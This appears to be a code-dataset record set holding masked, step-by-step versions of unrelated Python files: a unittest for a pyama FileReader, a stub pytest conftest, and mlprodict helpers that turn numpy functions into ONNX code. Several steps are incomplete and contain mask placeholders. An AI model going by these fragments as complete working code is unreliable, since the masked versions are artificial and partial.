"step-1": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n <mask token>\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-4": "import unittest\nfrom pyama.filereader import FileReader, Segment\n\n\nclass TestFileReader(unittest.TestCase):\n\n def test_reads_file(self):\n reader = FileReader('sample_reader_test.txt', regexes=[(\n 'name=\"(\\\\w+)\"', 'END SEGMENT'), ('\\\\s*\\\\*\\\\s*START\\\\s*(\\\\w+)',\n 'END SEGMENT'), ('PYTHON\\\\s+SEGMENT\\\\s+(\\\\w[\\\\w\\\\d_]*)', None)])\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment('name', 'file name')\n line = (\n ' SNIPPET START A=B B=13 K=\\'ha mi\\' ZIG=\"ZA G\" WITH hami -> \"mami\" '\n )\n FileReader('whatnot', ['onces']).analyze_parameters(line, segment)\n self.assertEqual(segment.parameters['A'], 'B')\n self.assertEqual(segment.parameters['B'], '13')\n self.assertEqual(segment.parameters['K'], 'ha mi')\n self.assertEqual(segment.parameters['ZIG'], 'ZA G')\n\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-5": "#! /usr/bin/python\n# -*- coding: utf8 -*-\n# vim: tabstop=8 expandtab shiftwidth=4 softtabstop=4\nimport unittest\n\nfrom pyama.filereader import FileReader,Segment\n\n\nclass TestFileReader(unittest.TestCase):\n def test_reads_file(self):\n reader = FileReader(\n \"sample_reader_test.txt\",\n regexes=[(r'name=\"(\\w+)\"', 'END SEGMENT'),\n (r'\\s*\\*\\s*START\\s*(\\w+)', 'END SEGMENT'),\n (r\"PYTHON\\s+SEGMENT\\s+(\\w[\\w\\d_]*)\", None)]\n )\n file = reader.read()\n self.assertEqual(7, len(file.segments))\n self.assertEqual('0', file.segments[0].name)\n self.assertEqual(2, len(file.segments[0].text))\n self.assertEqual('segmentOne', file.segments[1].name)\n self.assertEqual(3, len(file.segments[1].text))\n self.assertEqual('1', file.segments[2].name)\n self.assertEqual(1, len(file.segments[2].text))\n self.assertEqual('anotherSegment', file.segments[3].name)\n self.assertEqual(6, len(file.segments[3].text))\n self.assertEqual('2', file.segments[4].name)\n self.assertEqual(2, len(file.segments[4].text))\n self.assertEqual('python_segment', file.segments[5].name)\n self.assertEqual(4, len(file.segments[5].text))\n self.assertEqual('python_segment', file.segments[6].name)\n self.assertEqual(3, len(file.segments[6].text))\n\n def test_analyses_parameters(self):\n segment = Segment(\"name\",\"file name\")\n line = \"\"\" SNIPPET START A=B B=13 K='ha mi' ZIG=\"ZA G\" WITH hami -> \"mami\" \"\"\"\n FileReader(\"whatnot\",[\"onces\"]).analyze_parameters(line,segment)\n self.assertEqual(segment.parameters[\"A\"],\"B\")\n self.assertEqual(segment.parameters[\"B\"],\"13\")\n self.assertEqual(segment.parameters[\"K\"],\"ha mi\")\n self.assertEqual(segment.parameters[\"ZIG\"],\"ZA G\")\n\nif __name__ == '__main__':\n unittest.main()\n",
"step-ids": [
2,
3,
4,
5,
6
]
}
|
[
2,
3,
4,
5,
6
] |
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
import pytest
<|reserved_special_token_1|>
"""
======================
@author:小谢学测试
@time:2021/9/8:8:34
@email:xie7791@qq.com
======================
"""
import pytest
# @pytest.fixture()
# def login():
# print("登录方法")
# def pytest_conftest(config):
# marker_list = ["search","login"]
# for markers in marker_list:
# config.addinivalue_line("markers",markers)
|
flexible
|
{
"blob_id": "b52429f936013ac60659950492b67078fabf3a13",
"index": 4042,
"step-1": "<mask token>\n",
"step-2": "<mask token>\nimport pytest\n",
"step-3": "\"\"\"\n======================\n@author:小谢学测试\n@time:2021/9/8:8:34\n@email:xie7791@qq.com\n======================\n\"\"\"\nimport pytest\n# @pytest.fixture()\n# def login():\n# print(\"登录方法\")\n\n# def pytest_conftest(config):\n# marker_list = [\"search\",\"login\"]\n# for markers in marker_list:\n# config.addinivalue_line(\"markers\",markers)",
"step-4": null,
"step-5": null,
"step-ids": [
0,
1,
2
]
}
|
[
0,
1,
2
] |
"""
@file
@brief One class which visits a syntax tree.
"""
import inspect
import ast
from textwrap import dedent
import numpy
from scipy.spatial.distance import squareform, pdist
from .node_visitor_translator import CodeNodeVisitor
def py_make_float_array(cst, op_version=None):
"""
Creates an array with a single element
from a constant.
@param cst constant
@param op_version unused
@return array
.. runpython::
:showcode:
:warningout: DeprecationWarning
from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array
print(py_make_float_array(5.5))
"""
return numpy.array([cst], dtype=numpy.float32)
def py_pow(x, p, op_version=None):
"""
Function for python operator ``**``.
@param x float
@param p power
@param op_version unused
@return :math:`x^p`
"""
return x ** p
def py_mul(*x, op_version=None):
"""
Function for python operator ``*``.
@param x floats
@param op_version unused
@return `x*y`
"""
if len(x) == 2:
return x[0] * x[1]
p = x[0]
for y in x[1:]:
p *= y
return p
def py_opp(x, op_version=None):
"""
Function for python unary operator ``-``.
@param x floats
@param op_version unused
@return `-x`
"""
return -x
def squareform_pdist(X, metric='sqeuclidean', op_version=None):
"""
Replacements for `squareform
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.squareform.html>`_
and `pdist
<http://scipy.github.io/devdocs/generated/scipy.spatial.distance.pdist.html>`_.
"""
return squareform(pdist(X, metric=metric))
def get_default_context():
"""
Returns a default context useful for most of the conversion
from a function using :epkg:`numpy` into :epkg:`ONNX`.
"""
context = {'py_pow': py_pow, 'py_make_float_array': py_make_float_array,
'py_mul': py_mul, 'py_opp': py_opp,
'cdist': 'cdist', 'squareform_pdist': 'squareform_pdist'}
allow = set(('abs add ceil arccos arccosh arcsin arcsinh arctan arctanh ceil cos cosh divide'
'equal exp floor greater invert less log matmul maximum minimum mod'
'multiply power sign sin sinh sqrt square subtract tan tanh transpose').split())
for k, v in numpy.__dict__.items():
if k not in allow:
continue
context[f'numpy.{k}'] = v
context[f'np.{k}'] = v
return context
def get_default_context_cpl():
"""
Returns a default useful context to compile the converter
returned by @see fn translate_fct2onnx.
"""
ctx = {'py_make_float_array': py_make_float_array,
'py_pow': py_pow, 'py_mul': py_mul, 'py_opp': py_opp,
'numpy': numpy}
try:
from skl2onnx.algebra.complex_functions import onnx_squareform_pdist # delayed
from skl2onnx.algebra.complex_functions import onnx_cdist # delayed
ctx['onnx_squareform_pdist'] = onnx_squareform_pdist
ctx['onnx_cdist'] = onnx_cdist
except ImportError: # pragma: no cover
# Too old version for skl2onnx.
pass
from skl2onnx.algebra import onnx_ops # delayed
from skl2onnx.algebra.onnx_operator import OnnxOperator # delayed
d = onnx_ops.__dict__
for k, v in d.items():
try:
if k.startswith("Onnx") and issubclass(v, OnnxOperator):
ctx[k] = v
except TypeError as e:
if inspect.isfunction(v):
continue
raise RuntimeError( # pragma: no cover
f"Issue with {k}={v} (type={type(v)})") from e
return ctx
def translate_fct2onnx(fct, context=None, cpl=False,
context_cpl=None, output_names=None,
dtype=numpy.float32,
verbose=0, fLOG=None):
"""
Translates a function into :epkg:`ONNX`. The code it produces
is using classes *OnnxAbs*, *OnnxAdd*, ...
@param fct function to convert
@param context context of the function to convert
something like ``{'numpy.transpose': numpy.transpose}``,
if *context* is None, it receives a default value
returnd by @see fn get_default_context
@param cpl compile the function after it was
created
@param context_cpl context used at compiling time
if *context_cpl* is None, it receives a default value
returnd by @see fn get_default_context_cpl
@param output_names names of the output in the :epkg:`ONNX` graph
@param dtype :epkg:`numpy` float type used to produce the model
@param verbose integer, display more information
@param fLOG logging function
@return code or compiled code
.. exref::
:title: Convert a function into ONNX code
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx2.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
onnx_code = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose})
print(onnx_code)
Next example goes further and compile the outcome.
.. exref::
:title: Convert a function into ONNX code and run
The following code parses a python function and returns
another python function which produces an :epkg:`ONNX`
graph if executed. The example executes the function,
creates an :epkg:`ONNX` then uses @see cl OnnxInference
to compute *predictions*. Finally it compares
them to the original.
.. runpython::
:showcode:
:warningout: DeprecationWarning
:process:
:store_in_file: fct2onnx3.py
import numpy
from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx
from mlprodict.plotting.text_plot import onnx_simple_text_plot
from mlprodict.onnxrt import OnnxInference
from mlprodict.npy.xop import loadop
OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(
'Add', 'Transpose', 'Mul', 'Identity')
ctx = {'OnnxAdd': OnnxAdd,
'OnnxTranspose': OnnxTranspose,
'OnnxMul': OnnxMul,
'OnnxIdentity': OnnxIdentity}
def trs(x, y):
z = x + numpy.transpose(y, axes=[1, 0])
return x * z
inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),
'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}
original = trs(inputs['x'], inputs['y'])
print('original output:', original)
onnx_fct = translate_fct2onnx(
trs, context={'numpy.transpose': numpy.transpose},
cpl=True, context_cpl=ctx, output_names=['Z'])
onnx_code = onnx_fct('x', 'y', op_version=12)
onnx_g = onnx_code.to_onnx(inputs, target_opset=12)
print("ONNX model")
print(onnx_simple_text_plot(onnx_g))
oinf = OnnxInference(onnx_g)
res = oinf.run(inputs)
print('-----------')
print("ONNX inference:", res['Z'])
The function to be converted may include python functions
which must not be converted. In that case, their name
must be prefixed by ``py_``. The execution of the function
this one builds produces the following error::
TypeError: Parameter to MergeFrom() must be instance of same class:
expected onnx.TensorProto got onnx.AttributeProto.
It indicates that constants in the code marges multiple types,
usually floats and tensor of floats. Floats should be converted
using the following function::
def py_make_float_array(cst):
return numpy.array([cst], dtype=numpy.float32)
The function replaces empty contexts by default values which
covers many :epkg:`numpy` functions. The tutorial
:ref:`l-onnx-tutorial` gives an example of how it can be used
on a more complex function.
"""
def compile_code(name, code, context=None):
"""
Compiles a python function with the given
context.
@param name function name
@param code python code
@param context context used at compilation
@return compiled function
"""
if context is None:
context = {} # pragma: no cover
try:
obj = compile(code, "", "exec")
except SyntaxError as e: # pragma: no cover
raise SyntaxError(f"Unable to compile\n{code}") from e
context_g = context.copy()
context_l = context.copy()
exec(obj, context_g, context_l) # pylint: disable=W0122
return context_l[name]
if isinstance(fct, str):
code = fct
elif callable(fct):
code = inspect.getsource(fct)
else:
raise TypeError( # pragma: no cover
f"Unable to guess code from type {type(fct)}.")
node = ast.parse(dedent(code))
v = CodeNodeVisitor()
v.visit(node)
if context is None:
context = get_default_context()
onnx_code = v.export(context=context,
output_names=output_names)
if not cpl:
return onnx_code
if verbose > 0 and fLOG is not None: # pragma: no cover
fLOG('[translate_fct2onnx] python code')
fLOG(code)
fLOG('[translate_fct2onnx] ONNX code')
fLOG(onnx_code)
if context_cpl is None:
context_cpl = get_default_context_cpl()
if 'numpy' not in context_cpl:
context_cpl = context_cpl.copy()
context_cpl['numpy'] = numpy
return compile_code(fct.__name__, onnx_code, context_cpl)
|
normal
|
{
"blob_id": "fdf6c28e65b50c52550a95c2d991b1eb3ec53a2f",
"index": 3540,
"step-1": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\n<mask token>\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into 
:epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
"step-2": "<mask token>\n\n\ndef py_make_float_array(cst, op_version=None):\n \"\"\"\n Creates an array with a single element\n from a constant.\n\n @param cst constant\n @param op_version unused\n @return array\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n\n from mlprodict.onnx_tools.onnx_grammar.onnx_translation import py_make_float_array\n print(py_make_float_array(5.5))\n \"\"\"\n return numpy.array([cst], dtype=numpy.float32)\n\n\ndef py_pow(x, p, op_version=None):\n \"\"\"\n Function for python operator ``**``.\n\n @param x float\n @param p power\n @param op_version unused\n @return :math:`x^p`\n \"\"\"\n return x ** p\n\n\ndef py_mul(*x, op_version=None):\n \"\"\"\n Function for python operator ``*``.\n\n @param x floats\n @param op_version unused\n @return `x*y`\n \"\"\"\n if len(x) == 2:\n return x[0] * x[1]\n p = x[0]\n for y in x[1:]:\n p *= y\n return p\n\n\ndef py_opp(x, op_version=None):\n \"\"\"\n Function for python unary operator ``-``.\n\n @param x floats\n @param op_version unused\n @return `-x`\n \"\"\"\n return -x\n\n\n<mask token>\n\n\ndef get_default_context_cpl():\n \"\"\"\n Returns a default useful context to compile the converter\n returned by @see fn translate_fct2onnx.\n \"\"\"\n ctx = {'py_make_float_array': py_make_float_array, 'py_pow': py_pow,\n 'py_mul': py_mul, 'py_opp': py_opp, 'numpy': numpy}\n try:\n from skl2onnx.algebra.complex_functions import onnx_squareform_pdist\n from skl2onnx.algebra.complex_functions import onnx_cdist\n ctx['onnx_squareform_pdist'] = onnx_squareform_pdist\n ctx['onnx_cdist'] = onnx_cdist\n except ImportError:\n pass\n from skl2onnx.algebra import onnx_ops\n from skl2onnx.algebra.onnx_operator import OnnxOperator\n d = onnx_ops.__dict__\n for k, v in d.items():\n try:\n if k.startswith('Onnx') and issubclass(v, OnnxOperator):\n ctx[k] = v\n except TypeError as e:\n if inspect.isfunction(v):\n continue\n raise RuntimeError(f'Issue with {k}={v} (type={type(v)})') from e\n return 
ctx\n\n\ndef translate_fct2onnx(fct, context=None, cpl=False, context_cpl=None,\n output_names=None, dtype=numpy.float32, verbose=0, fLOG=None):\n \"\"\"\n Translates a function into :epkg:`ONNX`. The code it produces\n is using classes *OnnxAbs*, *OnnxAdd*, ...\n\n @param fct function to convert\n @param context context of the function to convert\n something like ``{'numpy.transpose': numpy.transpose}``,\n if *context* is None, it receives a default value\n returnd by @see fn get_default_context\n @param cpl compile the function after it was\n created\n @param context_cpl context used at compiling time\n if *context_cpl* is None, it receives a default value\n returnd by @see fn get_default_context_cpl\n @param output_names names of the output in the :epkg:`ONNX` graph\n @param dtype :epkg:`numpy` float type used to produce the model\n @param verbose integer, display more information\n @param fLOG logging function\n @return code or compiled code\n\n .. exref::\n :title: Convert a function into ONNX code\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed.\n\n .. runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx2.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n onnx_code = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose})\n print(onnx_code)\n\n Next example goes further and compile the outcome.\n\n .. exref::\n :title: Convert a function into ONNX code and run\n\n The following code parses a python function and returns\n another python function which produces an :epkg:`ONNX`\n graph if executed. The example executes the function,\n creates an :epkg:`ONNX` then uses @see cl OnnxInference\n to compute *predictions*. Finally it compares\n them to the original.\n\n .. 
runpython::\n :showcode:\n :warningout: DeprecationWarning\n :process:\n :store_in_file: fct2onnx3.py\n\n import numpy\n from mlprodict.onnx_tools.onnx_grammar import translate_fct2onnx\n from mlprodict.plotting.text_plot import onnx_simple_text_plot\n from mlprodict.onnxrt import OnnxInference\n from mlprodict.npy.xop import loadop\n\n\n OnnxAdd, OnnxTranspose, OnnxMul, OnnxIdentity = loadop(\n 'Add', 'Transpose', 'Mul', 'Identity')\n\n\n ctx = {'OnnxAdd': OnnxAdd,\n 'OnnxTranspose': OnnxTranspose,\n 'OnnxMul': OnnxMul,\n 'OnnxIdentity': OnnxIdentity}\n\n def trs(x, y):\n z = x + numpy.transpose(y, axes=[1, 0])\n return x * z\n\n inputs = {'x': numpy.array([[1, 2]], dtype=numpy.float32),\n 'y': numpy.array([[-0.3, 0.4]], dtype=numpy.float32).T}\n\n original = trs(inputs['x'], inputs['y'])\n\n print('original output:', original)\n\n onnx_fct = translate_fct2onnx(\n trs, context={'numpy.transpose': numpy.transpose},\n cpl=True, context_cpl=ctx, output_names=['Z'])\n\n onnx_code = onnx_fct('x', 'y', op_version=12)\n\n onnx_g = onnx_code.to_onnx(inputs, target_opset=12)\n print(\"ONNX model\")\n print(onnx_simple_text_plot(onnx_g))\n\n oinf = OnnxInference(onnx_g)\n res = oinf.run(inputs)\n\n print('-----------')\n print(\"ONNX inference:\", res['Z'])\n\n The function to be converted may include python functions\n which must not be converted. In that case, their name\n must be prefixed by ``py_``. The execution of the function\n this one builds produces the following error::\n\n TypeError: Parameter to MergeFrom() must be instance of same class:\n expected onnx.TensorProto got onnx.AttributeProto.\n\n It indicates that constants in the code marges multiple types,\n usually floats and tensor of floats. Floats should be converted\n using the following function::\n\n def py_make_float_array(cst):\n return numpy.array([cst], dtype=numpy.float32)\n\n The function replaces empty contexts by default values which\n covers many :epkg:`numpy` functions. 
The tutorial\n :ref:`l-onnx-tutorial` gives an example of how it can be used\n on a more complex function.\n \"\"\"\n\n def compile_code(name, code, context=None):\n \"\"\"\n Compiles a python function with the given\n context.\n\n @param name function name\n @param code python code\n @param context context used at compilation\n @return compiled function\n \"\"\"\n if context is None:\n context = {}\n try:\n obj = compile(code, '', 'exec')\n except SyntaxError as e:\n raise SyntaxError(f'Unable to compile\\n{code}') from e\n context_g = context.copy()\n context_l = context.copy()\n exec(obj, context_g, context_l)\n return context_l[name]\n if isinstance(fct, str):\n code = fct\n elif callable(fct):\n code = inspect.getsource(fct)\n else:\n raise TypeError(f'Unable to guess code from type {type(fct)}.')\n node = ast.parse(dedent(code))\n v = CodeNodeVisitor()\n v.visit(node)\n if context is None:\n context = get_default_context()\n onnx_code = v.export(context=context, output_names=output_names)\n if not cpl:\n return onnx_code\n if verbose > 0 and fLOG is not None:\n fLOG('[translate_fct2onnx] python code')\n fLOG(code)\n fLOG('[translate_fct2onnx] ONNX code')\n fLOG(onnx_code)\n if context_cpl is None:\n context_cpl = get_default_context_cpl()\n if 'numpy' not in context_cpl:\n context_cpl = context_cpl.copy()\n context_cpl['numpy'] = numpy\n return compile_code(fct.__name__, onnx_code, context_cpl)\n",
